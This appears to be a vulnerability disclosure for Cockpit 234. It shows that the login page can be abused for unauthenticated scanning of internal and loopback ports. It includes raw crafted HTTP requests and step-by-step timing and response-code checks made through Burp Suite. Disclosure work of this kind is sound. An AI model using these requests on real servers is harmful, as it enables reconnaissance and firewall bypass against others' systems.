- Cockpit version: 234
- OS: Ubuntu 18.04
- Page: login
An unauthenticated user can detect open ssh port or another open ports on server that services Cockpit last version. In addition, this vulnerability that allows a user sends request to internal hosts for detecting open ports so that firewall configuration can be bypassed or the server can be used like gateway by attacker user for scanning process. For example, if system admin creates iptables rule to drop all packets that come to 22 port or another port, user can detect whether port 22 is open or not. Assuming that there is a rule which the port 22 is open for 127.0.0.1 (loopback interface) only .
First HTTP Request:
GET /cockpit+=192.168.1.27:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
Second HTTP Request:
GET /cockpit+=127.0.0.1:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
On login panel,
- Click Other Options.
- Set 127.0.0.1 to Connect to field and send request with incorrect credentials.
- Intercept the request with Burp Suite
- If ssh service is open on port 22 and credentials are wrong, server returns "401 Authentication Failed" response.
- If user tries connect to a port that accepts data for ssh connection , server returns "401 Authentication failed: no-host" response and waits 10 seconds.
- If user tries connect to a closed port , server returns "401 Authentication failed: no-host" response without waiting.
- If ssh service is open on port 22 and credentials are correct, server returns "200" response.
- You can detect open ports on internal server or loopback interface of target server by changing remote port number.
